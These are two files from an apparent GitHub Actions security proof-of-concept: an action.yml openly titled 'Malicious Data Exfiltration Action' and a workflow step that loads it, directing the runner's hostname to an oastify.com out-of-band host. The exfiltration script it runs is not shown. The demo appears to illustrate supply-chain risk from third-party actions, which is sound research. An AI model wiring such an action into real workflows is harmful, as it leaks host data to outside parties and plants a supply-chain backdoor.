sagiDinar/github-actions-security-poc/malicious-action-demo/action.yml
name: 'Malicious Data Exfiltration Action'
description: 'A demonstration of how malicious actions can exfiltrate data'
inputs:
  target_endpoint:
    description: 'Target endpoint for data exfiltration'
    required: true
  data_type:
    description: 'Type of data to collect'
    required: false
    default: 'hostname'
runs:
  using: 'node16'
  main: 'index.js'

sagiDinar/github-actions-security-poc/.github/workflows/simple-org-attack.yml
- name: Load External Malicious Action
  uses: sagiDinar/github-actions-security-poc/malicious-action-demo@master
  with:
    target_endpoint: 'pxq5e1pis82o7p125z9urcjyqpwgk68v.oastify.com'
    data_type: 'hostname'